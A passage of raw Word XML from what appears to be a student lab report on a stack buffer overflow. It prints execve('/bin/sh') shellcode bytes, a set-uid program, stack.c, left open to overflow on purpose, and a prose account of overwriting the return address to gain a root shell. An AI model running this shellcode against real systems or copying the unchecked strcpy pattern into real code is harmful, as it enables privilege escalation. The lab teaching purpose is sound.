    <w:p w14:paraId="7C9C3592" w14:textId="78F79663" w:rsidR="00AB20EF" w:rsidRPr="000941B1" w:rsidRDefault="00AB20EF" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Shellcode: </w:t>
      </w:r>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">We need a shellcode to start the attack. This shellcode is used to launch a new shell. We need to load the shellcode into the memory so that the vulnerable program jumps to the shellcode and executes it. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D1ACFD" w14:textId="26F8B41D" w:rsidR="0027147C" w:rsidRPr="000941B1" w:rsidRDefault="00AB20EF" w:rsidP="0058424D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>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below piece of code launches a new shell. We use the assembly version of this program for our attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8CDFA2" w14:textId="2A6BFCF4" w:rsidR="00AB20EF" w:rsidRPr="000941B1" w:rsidRDefault="00AB20EF" w:rsidP="0058424D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27FC6733" w14:textId="6358F8CB"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#include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190FE2DA" w14:textId="77777777"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int main( ) { char *name[2];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC5E4FC" w14:textId="77777777"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name[0] = ‘‘/bin/sh’’; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0FC021" w14:textId="77777777"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name[1] = NULL; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117E7813" w14:textId="0BEE8FCF"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execve(name[0], name, NULL);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCDE223" w14:textId="77777777"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C1E0EE" w14:textId="77777777" w:rsidR="00AB20EF" w:rsidRPr="000941B1" w:rsidRDefault="00AB20EF" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="505572DC" w14:textId="77777777" w:rsidR="00AB20EF" w:rsidRPr="000941B1" w:rsidRDefault="00AB20EF" w:rsidP="0058424D">
      <w:pPr>
        <w:ind w:firstLine="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Assembly version of the above code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187A6AD0" w14:textId="28DC7CD0"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"\x31\xc0" </w:t>
      </w:r>
      <w:r w:rsidR="00BC78AD" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="002C744B"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1: xorl %eax,%eax */ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4EA214" w14:textId="32FC9237"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"\x50" </w:t>
      </w:r>
      <w:r w:rsidR="00BC78AD" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>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2: pushl %eax */ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56101624" w14:textId="1E822412"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"\x68""//sh" </w:t>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3: pushl $0x68732f2f */ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04484503" w14:textId="01AE8316"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"\x68""/bin" </w:t>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4: pushl $0x6e69622f */ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1353DD56" w14:textId="4E217907"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"\x89\xe3" </w:t>
      </w:r>
      <w:r w:rsidR="00BC78AD" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="002C744B"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5: movl %esp,%ebx */ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2956F6" w14:textId="1EE78D7B"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"\x50" </w:t>
      </w:r>
      <w:r w:rsidR="00BC78AD" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>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6: pushl %eax */ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9F0D10" w14:textId="342B5ACA" w:rsidR="00AB20EF"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"\x53" </w:t>
      </w:r>
      <w:r w:rsidR="00BC78AD" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>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Line 7: pushl %ebx */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009F7427" w14:textId="752CEA5D"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"\x89\xe1" </w:t>
      </w:r>
      <w:r w:rsidR="00BC78AD" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="002C744B"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8: movl %esp,%ecx */ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72ADA65F" w14:textId="7E46BD36"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"\x99" </w:t>
      </w:r>
      <w:r w:rsidR="00BC78AD" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00BC78AD" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0058424D"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9: cdq */ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1551EDB1" w14:textId="5727F668" w:rsidR="00BC78AD"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"\xb0\x0b" </w:t>
      </w:r>
      <w:r w:rsidR="00BC78AD" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="002C744B" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/* Line 10: movb $0x0b,%al */ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACFC5B7" w14:textId="3324E11A" w:rsidR="0027147C" w:rsidRPr="000941B1" w:rsidRDefault="00AB20EF" w:rsidP="0058424D">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">"\xcd\x80" </w:t>
      </w:r>
      <w:r w:rsidR="00BC78AD" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="002C744B" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/* Line 11: int $0x80 */</w:t>
      </w:r>
      <w:r w:rsidR="0027147C" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA8AC8A" w14:textId="4479B0D1" w:rsidR="00BC78AD" w:rsidRPr="000941B1" w:rsidRDefault="00BC78AD" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B812A9B" w14:textId="691D7E1A" w:rsidR="00BC78AD" w:rsidRPr="000941B1" w:rsidRDefault="00BC78AD"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lastRenderedPageBreak/>
        <w:t>We load this code into the memory using exploit.c which creates a bad file, and the bad file is read by stack.c, running the stack.c generates a new root shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7B9120" w14:textId="3E7B3EC2" w:rsidR="001C6D52" w:rsidRPr="000941B1" w:rsidRDefault="001C6D52" w:rsidP="0058424D">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="192372EB" w14:textId="1DB43FCD" w:rsidR="001C6D52" w:rsidRPr="000941B1" w:rsidRDefault="001C6D52" w:rsidP="0058424D">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18803C4A" w14:textId="0A959FBA" w:rsidR="00BC78AD" w:rsidRPr="000941B1" w:rsidRDefault="00BC78AD" w:rsidP="0058424D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="574A8EE1" w14:textId="00435A62" w:rsidR="00FB6CB9" w:rsidRPr="000941B1" w:rsidRDefault="00FB6CB9" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk22550632"/>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Directing the program control to the shellcode(malicious</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">): </w:t>
      </w:r>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>To make the program jump to the shellcode, we need to modify the return address in our program so that program control jumps to the address</w:t>
      </w:r>
      <w:r w:rsidR="00085B80" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>the return address</w:t>
      </w:r>
      <w:r w:rsidR="00085B80" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> is replaced with</w:t>
      </w:r>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F5D606" w14:textId="12206D3D" w:rsidR="00FB6CB9" w:rsidRPr="000941B1" w:rsidRDefault="00FB6CB9" w:rsidP="0058424D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A1BBE27" w14:textId="46819516" w:rsidR="00085B80" w:rsidRPr="000941B1" w:rsidRDefault="00FB6CB9"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Vulnerable program used in our project is stack.c</w:t>
      </w:r>
      <w:r w:rsidR="00085B80" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. This program has a buffer overflow vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E4644B" w14:textId="7DFBE0CB" w:rsidR="00085B80" w:rsidRPr="000941B1" w:rsidRDefault="00085B80"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 stack.c */ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00164008"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#include &lt;stdlib.h&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC25DC3"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#include &lt;stdio.h&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A28911" w14:textId="70A31DFD"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#include &lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D711D3B"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int bof(char *str) { char buffer[24];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E62226A"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The following statement has a buffer overflow problem */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677B21EB" w14:textId="05CF00D9"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strcpy(buffer, str);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D12B21"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return 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68708D5E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11631723"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int main(int argc, char **argv) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B7A933"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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C6BB04"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char str[517]; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41EFA0EC" w14:textId="4DE2D308"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FILE *badfile;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBAD03C"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badfile = fopen("badfile", "r");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E1FAC1"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fread(str, sizeof(char), 517, badfile); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0825629E" w14:textId="77777777"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 xml:space="preserve">bof(str); printf("Returned Properly\n"); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FD5F38" w14:textId="135D94E2"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t>return 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247BE290" w14:textId="42EBCB33" w:rsidR="00085B80" w:rsidRPr="000941B1" w:rsidRDefault="00085B80" w:rsidP="0058424D">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADF3C51" w14:textId="1119D2A2" w:rsidR="00085B80" w:rsidRPr="000941B1" w:rsidRDefault="00085B80" w:rsidP="0058424D">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26B25736" w14:textId="5D993BCF" w:rsidR="00085B80" w:rsidRPr="000941B1" w:rsidRDefault="00085B80"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above program has a buffer overflow vulnerability.</w:t>
      </w:r>
      <w:r w:rsidR="00724226" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> It reads the input file called “bad file” and passes this input to the buffer in the function bof(). The buffer in the bof() has only 24 bytes</w:t>
      </w:r>
      <w:r w:rsidR="00EC21B1" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and t</w:t>
      </w:r>
      <w:r w:rsidR="00724226" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>he input h</w:t>
      </w:r>
      <w:r w:rsidR="00EC21B1" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00724226" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 517 bytes</w:t>
      </w:r>
      <w:r w:rsidR="00EC21B1" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00724226" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EC21B1" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00724226" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ecause strcpy() does not check boundaries buffer overflow will happen. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19990765" w14:textId="41030425" w:rsidR="00724226" w:rsidRPr="000941B1" w:rsidRDefault="00724226"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The above program is a set-uid</w:t>
      </w:r>
      <w:r w:rsidR="00F17B80" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> root</w:t>
      </w:r>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> program. We exploit this buffer overflow vulnerability to get to the root shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EF6CFD" w14:textId="1134ECB8" w:rsidR="00EC21B1" w:rsidRPr="000941B1" w:rsidRDefault="00EC21B1" w:rsidP="0058424D">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5992806A" w14:textId="77777777" w:rsidR="002C744B" w:rsidRPr="000941B1" w:rsidRDefault="00EC21B1"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When stack.c is loaded into the memory, buffer is loaded to the stack and the compiler adds some offset between buffer and the return address which makes it difficult to compute the Return address. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254E2A09" w14:textId="77777777" w:rsidR="004E607D" w:rsidRPr="000941B1" w:rsidRDefault="00EC21B1" w:rsidP="0058424D">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We </w:t>
      </w:r>
      <w:r w:rsidR="002C744B" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>find the location of the return address relative to the buffer and using the buffer we add the return address in the appropriate location.</w:t>
      </w:r>
      <w:r w:rsidR="004E607D" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Using exploit.c we add the return address in the 4 bytes using the buffer pointer and add the shellcode at the end of the buffer.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E17EC6C" w14:textId="55641087" w:rsidR="002C744B" w:rsidRPr="000941B1" w:rsidRDefault="004E607D" w:rsidP="0069567B">
      <w:pPr>
        <w:ind w:left="360"/>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We compile exploit.c and run it. </w:t>
      </w:r>
      <w:r w:rsidR="002C744B" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>When stack.c is executed, and the program control reaches return address, the program control jumps to the address</w:t>
      </w:r>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> provided as</w:t>
      </w:r>
      <w:r w:rsidR="002C744B" w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Return address. This address can point directly to the shellcode (malicious) or the Nops that we add before the shellcode (malicious) eventually executing the shellcode.</w:t>
      </w:r>
      <w:r w:rsidRPr="000941B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665D08E0" w14:textId="77777777" w:rsidR="002C744B" w:rsidRPr="000941B1" w:rsidRDefault="002C744B" w:rsidP="0058424D">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
